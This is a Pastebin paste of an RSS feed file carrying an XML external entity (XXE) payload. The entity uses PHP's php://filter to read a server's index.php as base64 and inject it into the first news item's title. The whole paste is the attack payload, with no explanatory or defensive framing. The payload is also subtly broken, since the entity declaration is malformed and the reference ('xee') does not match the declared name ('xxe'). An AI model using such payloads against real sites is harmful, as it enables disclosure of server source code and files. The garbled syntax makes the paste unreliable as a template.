Advertisement
crax83

Untitled

Mar 3rd, 2016
306
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. <?xml version="1.0" encoding="UTF-8"?>
  2. <!DOCTYPE channel [!ENTITY xxe SYSTEM "php://filter/read=convert.base64-encode/resource=index.php"]>
  3. <rss version="2.0">
  4.     <channel>
  5.         <title>Mon site</title>
  6.         <description>lol</description>
  7.         <lastBuildDate>Sat, 07 Sep 2002 00:00:01 GMT</lastBuildDate>
  8.         <link>http://www.example.org</link>
  9.         <item>
  10.             <title>&xee;</title>
  11.             <description>Ceci est ma première actualité</description>
  12.             <pubDate>Sat, 07 Sep 2002 00:00:01 GMT</pubDate>
  13.             <link>http://www.example.org/actu1</link>
  14.         </item>
  15.         <item>
  16.             <title>Actualité N°2</title>
  17.             <description>Ceci est ma seconde actualité</description>
  18.             <pubDate>Sat, 07 Sep 2002 00:00:01 GMT</pubDate>
  19.             <link>http://www.example.org/actu2</link>
  20.         </item>
  21.     </channel>
  22. </rss>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement